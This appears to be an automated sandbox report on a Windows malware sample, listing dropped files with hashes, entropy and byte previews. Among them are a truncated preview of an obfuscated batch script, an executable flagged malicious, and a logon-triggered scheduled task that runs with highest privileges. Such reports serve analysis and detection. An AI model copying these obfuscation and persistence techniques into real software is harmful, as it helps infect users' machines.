SHA-256:	ACB01938E3B78AB47BB8C9CFCCD4BD37E9091AC0C3A521568711EB2941870847
SHA-512:	D3350CF478ADB3431DB65D76F4B872954B2BA99A40F21C4925279F5193AA1F22F72228D4E2231FCEF3782292C1021DAB64BAC3601BC22DFBC0FB7A1354D1068F
Malicious:	false
Preview:	0..........0.....+.....0......0...0......N"T ....n..........9..20241208190253Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9...C.P..5/..y.r..P....20241208190253Z....20241215190253Z0....H...............\C..em....=.YGE.w#.'/...q\|.......=N.n.e..}..........<.iD.......s...'...........z...{P.~..-\|..YH1..%.....H:p.m..Ga..p.f\..!q..............].:....7.2>^.4=b..-....Eg.........g>.1.:. .B{!.....\w..%.0.....p..B.A.......^y^....hv.....@...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	7796
Entropy (8bit):	7.971943145771426
Encrypted:	false
SSDEEP:	192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
MD5:	FB60E1AFE48764E6BF78719C07813D32
SHA1:	A1DC74EF8495C9A1489DD937659B5C2875027E16
SHA-256:	EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
SHA-512:	92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
Malicious:	false
Preview:	MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..\|..9.........{...\|d..v.T..w.TMZ.\|...).F.rtAm.....f......T........n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..\|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...\|.h..$."r..hL9TR..}.v%...4).H..[.....r..\|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X\|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.3330420873786126
Encrypted:	false
SSDEEP:	6:kKOPK81F9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:my0sDImsLNkPlE99SNxAhUe/3
MD5:	3401667948CC12F41F01848BA19E61D0
SHA1:	0AE651232578B685C088934A787EEC1A659D91E7
SHA-256:	087538B0FB63268B8188833AC70945FDCF951AC80F1F6C3F36D5F14CCD5A1FA8
SHA-512:	8DBB03F2504C813B4EBDB8C76717A20CA3C69850C0FD84592DF8AF4940A97C670BE2D5A49134084F43E4DCB293F116160E7491C40EFD8984655E1881D6146173
Malicious:	false
Preview:	p...... ........J....J..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.694490439804482
Encrypted:	false
SSDEEP:	6:kKohj/0smn+EXlRNfOAUMivhClroFFKIhipStaHAaloq09Slscqsn:EjM3TmxMiv8sFFKbpgal7BlSs
MD5:	626E0E672BA3C985F85B7B28BB8D34C2
SHA1:	8D5C858293EA4137B5BE2AE1A67E43F19F37DBD5
SHA-256:	08A0C157B8EA33A5845023CA4F9A1EBE44BB2195B483C25B236749031BF465D9
SHA-512:	A9EB873056896366F607D3BF90577979918F42938649AAF9869126C8F366891BC98E10D3F0F3B4027240ADBAA898C7E77D694FB3DD98E0DC44884ED2822FB564
Malicious:	false
Preview:	p...... ....(.......J..(...................................................#O.. ............J.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.n.5.b.s.K.V.V.V.8.k.d.J.6.v.H.l.3.O.1.J.0.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.683705379524527
Encrypted:	false
SSDEEP:	6:kKNT/Az/scEXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsQ30P7v+eWAkrn:1kMmxMiv8sFFKbpgal7BlD30PLRWAkr
MD5:	D3FAFBF7544379A9AE5157549B0199A8
SHA1:	DC7ECC3B41A744B1B922F6FB7FA8DD7F13DDEB45
SHA-256:	6FF3AE3FA741DF7D560D7ACFA615BDB1BC2881DC43F0BA5352C76825AD5F8B3D
SHA-512:	C166C0A864EA3FDB277A36B70BA97EF6778CDB6B42CC1E262FFF4AE264FFB374DDD255ACFB03608963CB08A83A40CCB68D0C38A6E1ED8D381E2826B11686A10D
Malicious:	false
Preview:	p...... ....(........J..(................................................_..ZN.. .........9..J.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.U.Z.Z.S.Z.E.m.l.4.9.G.j.h.0.j.1.3.P.6.8.w.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.6876476257832644
Encrypted:	false
SSDEEP:	6:kK1s9EsEXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:gEDmxMiv8sFFKbpgal7BlwhZg
MD5:	35926133F95F8BBFFB43102C3168E2BC
SHA1:	0FB4524F928D031E32D85F29E95DE1895B42EF09
SHA-256:	28B94C502C35B8ADBC8D2A1B1DA28565B443EA7A508332971BABDBF73CC4DF35
SHA-512:	696BFA40F968CE8B1EED989899AA52F14B80FB2FFE71E3104BAC700890D9BDC9DB2C1776CD81D26A786D9A3DC5EF1D25F4195B142FB3386A4A3981799B701A1C
Malicious:	false
Preview:	p...... ....(....R...J..(.................................................e.#O.. ........k.2.J.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.3173623510022248
Encrypted:	false
SSDEEP:	6:kKYPK81wNSWsCN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:H0FkPlE99Si1QyIeek
MD5:	0E10E3F4D8C57D97645C65BC511564DC
SHA1:	C3F59F3F1993251E2EFCEAFF3FA94A55DA8A81E3
SHA-256:	058FE1D59FAD74F35279273CD7AE56C80E7C90826DB1AA651B1807FEF7145E76
SHA-512:	01597DE8AADBA1C5FC0497E06C530F94B44FBEEE79B519AEB0434CDFF1252C42015FF365777BDA29F3B707C1CEEA454EFBBAE9975A4528A0C48A2136E186E982
Malicious:	false
Preview:	p...... .............J..(....................................................... ........B@!........(....0."....t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	9713
Entropy (8bit):	4.940954773740904
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
MD5:	BA7C69EBE30EC7DA697D2772E36A746D
SHA1:	DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
SHA-256:	CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
SHA-512:	E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2892
Entropy (8bit):	5.437969087793142
Encrypted:	false
SSDEEP:	48:oizsSU4y4RQmFoUeCamfm9qr9t5/78NWR8lgxJZKaVEouYAgwd64rHLjtvk:oizlHyIFKL2O9qrh7KWBJ5Eo9Adrxk
MD5:	3D05665264FF5F9612A974D7E6FAF75D
SHA1:	EFAF5F2EB18DE5070947DE4B2B58F6F8ADF8C00E
SHA-256:	F807ED1F52729FE3DDB61E208FCEA8278FA7A7D6358C21055BC640E53E09A12A
SHA-512:	F2E2CB6A0248D6186B4EF1FDEFD532D82A663AE3494D6716A80B8134D7B6AEC542D12CD2282F038C6CE33C84E838880CE85927FADB868B46C275D2D806AB18CA
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ijeqlp2.faj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ro1ymda.0dm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqvafjhx.kcg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dd0hjjb1.yor.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\$nya-onimai2\$nya-Onimai.bat (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with very long lines (3523), with CRLF line terminators
Category:	dropped
Size (bytes):	7301955
Entropy (8bit):	6.016918973410356
Encrypted:	false
SSDEEP:	49152:afRq7YF410Ckz3qmh8VhdBC6+2u49Gc54h/GD8pWlvdOPX7XM/nTrOslcFMB+Bs5:t
MD5:	98F30844747B3B14F19B6127DF1765DC
SHA1:	2441D2660C67E64784C729732553779B952A8296
SHA-256:	C62DFF3F1B1B032DDB7E089B6E56CFCD27082D62A9627DEC4EC8F2423175B750
SHA-512:	55521BBF96E79678FAB3EBFE364F3F87CC53080616F4EAD5EF5129B52410FFFA782C541AEE2CF58486E5EB25EFD3FE56EA6C7178D03FA48CD786EA53EF0C478E
Malicious:	false
Preview:	@echo off..%CmQiIgrXupacUcKPqvVOFTdvyur%@%zACKdYngEFLgLAMGirTMKNXDBlKJjuJnPwyTNqZVPEkLKOcfhwngAFkLDZi%%oDXjVxrocSTRsYXfCmTMiFCMhDMjlMqNhhHlHbPmxOdoDvOCIeirfvJJ%e%kbsKhdpCfJk%%LyBwHpuBojMOkAgDYILyYjwZwBp%c%NLxLDlWGHUygphNbpEAGWMDwYMsBcCafZJOCLalYEAWekFiQw%%JSaIObhaNQTuDfUsgGskqotCcvPzmtEB%h%HSifqUNuKnufjWR%%SyCymeuzxGtlIOtmrpWm%o%mQLFPGbYxTyYpuVbdSCxJHKBBMVTiNTaEyFHRSwytAaMUntty%%nwtOcFfkedKhPJZytQPnk% %vediHXGotCvXAxGPvaCHO%%NmLqNwTCElacboLUXhDQKiLSjCRDuO%o%CwcrQxrkkuQXjXxvseBcvdYJFASglFqiPAxFYXUxGWsvTkBV%%gyzTMpzysLqEkYEeIhJzSxvkdvyLCPuYXufgQodlYhGlETwYNr%f%dSvTJdpPqQOVCrrGPTyntd%%AKQjFkZAXkErgCAwdBzNvkldUnnGepeRZv%f%jSTJFqpQKYaldoxvLUqcqzNpsWsvHgMrLHrEjSTwftAfTcjrHUtXIsEJeEr%..%XUjElIAwXTlTaUWWYIvqNbOMNOJscHzFAlylkWTlCMuOIA%s%OvILwibUWfwRwYhtptGsPvLMcOjNaGaenSUWuWdwzqCfNewmuseubhhtKVIHY%%TpfsEEelZsqkSzTGZYrWtIBF%e%fKBlzovymwmZ%%ASiitMdRoIAdWKpbTlNAqyTCZzeULGc%t%HExzOkoPBkQcbiDDgwslyyebYFiTHifIFTwrmPnIXYYg%%QBRWAOpnRiiAwBicuiseixhLlrqjJnAAYshdrXgtQuOKoR%l%oeGCPFbAtugLjygDDIICdtfKxcYoN

C:\Windows\$nya-onimai2\qVrKPA.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.3900594222407125
Encrypted:	false
SSDEEP:	384:VZCSSrPcfu1FIyBl3pdSRf+yTq5+9f2sMbRAxzQ1yTkepoeL80bk20OzSIS+gL0i:VZArPDDIulZdSRWfY9f/hngDU2/t7
MD5:	B943A57BDF1BBD9C33AB0D33FF885983
SHA1:	1CEE65EEA1AB27EAE9108C081E18A50678BD5CDC
SHA-256:	878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
SHA-512:	CB7253DE88BD351F8BCB5DC0B5760D3D2875D39F601396A4250E06EAD9E7EDEFFCD94FA23F392833F450C983A246952F2BAD3A40F84AFF2ADC0F7D0EB408D03C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...GB..........."...0.................. ....@...... ....................................`...@......@............... ............................................................................................................................... ..H............text........ ...................... ..`.rsrc...............................@..@........................................H......................................................................ga..G..I..6..+......6.2..5.tK@.g1.9.....Q...@a..W1...}.... .d......</.X....m..Zg.."."^.F..0......G.c.....(D..(....G...u.KM...........D.\|/..J3....?.vMl.-.P...)...RZ..-....\|.0.x.....D.....>...G...C..e.....IZem...s....\|.l~.c........<d...y.W..E..2.&c\z..Z.......................................................................................%%........;m2....2m;............................................

C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	DOS batch file, ASCII text, with very long lines (3523), with CRLF line terminators
Category:	dropped
Size (bytes):	7301955
Entropy (8bit):	6.016918973410356
Encrypted:	false
SSDEEP:	49152:afRq7YF410Ckz3qmh8VhdBC6+2u49Gc54h/GD8pWlvdOPX7XM/nTrOslcFMB+Bs5:t
MD5:	98F30844747B3B14F19B6127DF1765DC
SHA1:	2441D2660C67E64784C729732553779B952A8296
SHA-256:	C62DFF3F1B1B032DDB7E089B6E56CFCD27082D62A9627DEC4EC8F2423175B750
SHA-512:	55521BBF96E79678FAB3EBFE364F3F87CC53080616F4EAD5EF5129B52410FFFA782C541AEE2CF58486E5EB25EFD3FE56EA6C7178D03FA48CD786EA53EF0C478E
Malicious:	true
Preview:	@echo off..%CmQiIgrXupacUcKPqvVOFTdvyur%@%zACKdYngEFLgLAMGirTMKNXDBlKJjuJnPwyTNqZVPEkLKOcfhwngAFkLDZi%%oDXjVxrocSTRsYXfCmTMiFCMhDMjlMqNhhHlHbPmxOdoDvOCIeirfvJJ%e%kbsKhdpCfJk%%LyBwHpuBojMOkAgDYILyYjwZwBp%c%NLxLDlWGHUygphNbpEAGWMDwYMsBcCafZJOCLalYEAWekFiQw%%JSaIObhaNQTuDfUsgGskqotCcvPzmtEB%h%HSifqUNuKnufjWR%%SyCymeuzxGtlIOtmrpWm%o%mQLFPGbYxTyYpuVbdSCxJHKBBMVTiNTaEyFHRSwytAaMUntty%%nwtOcFfkedKhPJZytQPnk% %vediHXGotCvXAxGPvaCHO%%NmLqNwTCElacboLUXhDQKiLSjCRDuO%o%CwcrQxrkkuQXjXxvseBcvdYJFASglFqiPAxFYXUxGWsvTkBV%%gyzTMpzysLqEkYEeIhJzSxvkdvyLCPuYXufgQodlYhGlETwYNr%f%dSvTJdpPqQOVCrrGPTyntd%%AKQjFkZAXkErgCAwdBzNvkldUnnGepeRZv%f%jSTJFqpQKYaldoxvLUqcqzNpsWsvHgMrLHrEjSTwftAfTcjrHUtXIsEJeEr%..%XUjElIAwXTlTaUWWYIvqNbOMNOJscHzFAlylkWTlCMuOIA%s%OvILwibUWfwRwYhtptGsPvLMcOjNaGaenSUWuWdwzqCfNewmuseubhhtKVIHY%%TpfsEEelZsqkSzTGZYrWtIBF%e%fKBlzovymwmZ%%ASiitMdRoIAdWKpbTlNAqyTCZzeULGc%t%HExzOkoPBkQcbiDDgwslyyebYFiTHifIFTwrmPnIXYYg%%QBRWAOpnRiiAwBicuiseixhLlrqjJnAAYshdrXgtQuOKoR%l%oeGCPFbAtugLjygDDIICdtfKxcYoN

C:\Windows\System32\Tasks\$nya-gykiBRcP

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3494
Entropy (8bit):	3.580727026847448
Encrypted:	false
SSDEEP:	96:tpX9nkp2Gdi3ipVA9ll7EhAMz3cHtgjy++:j1kYx39OhO6jy++
MD5:	934211E98AB08A31D60AB6D2B68F11AA
SHA1:	C31571CC844F6678A52C42C58298452F15F055DA
SHA-256:	2CDE49B80B3EB4981F317C49B75920B158B7886F0DAABDCF9498F9F64B41E61A
SHA-512:	DD257706D5F8F05C76D2ED30EE1D7D94682A6730F5ADD46104EAFEEC95B02AB9187295758D9AB973B385796334B7C10EEE489F61AF013F88A493F9E2D1A78770
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.2.-.0.9.T.0.3.:.2.2.:.2.3...8.2.5.-.0.5.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.n.y.a.-.g.y.k.i.B.R.c.P.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.988722393354298
Encrypted:	false
SSDEEP:	6:kKi3bNv+B8hmsaJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:gcumspkPlE99SCQl2DUevat
MD5:	23F9F1A76209DA8BC8D9EDE1FDBC4C6F
SHA1:	7277F97CCBEA5C2AD643E3D78C7B9598F4DE2435
SHA-256:	C67831D1EFC585BCE36153237E90DC2CAAB262771439295435EE83F342BF7FCD
SHA-512:	73FF59FE5045B2DF410AFD0AF60714DBCC1EEF4E13A252287152B7B3FFB6B2D504BEACF29D86E4E19CDC74F491EAE96271F24DC76626D8FD4FB4B69F706FD16F
Malicious:	false
Preview:	p...... ........+.].....(................A...J......J....H..J..............J.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.9746304479877996
Encrypted:	false
SSDEEP:	6:kKqT/rO8sYe8kt2alXlRNfOAUMivhClroFFKIhipStaHAaloq09Sls8hW0XSW83n:Si1zmxMiv8sFFKbpgal7BlvTCN3
MD5:	B8B7B8E610EF766FC1EA05D7FC271688
SHA1:	16646AFB3383E7E5C06AF1454684DBD72596D9DB
SHA-256:	E92CFDF38D2D2C7B51E8FD5359AB3EC247BF05288ED603EBF2049B3B32ECBC3D
SHA-512:	84BBFAC4CF4076179DB169E9FC60AE36C5D16D46E4C14D03636FF7993A4599E8FD86C9014B5CCDD100B52F11DBCF13AD5F2B921FC25DFF83B225985BF9B743FD
Malicious:	false
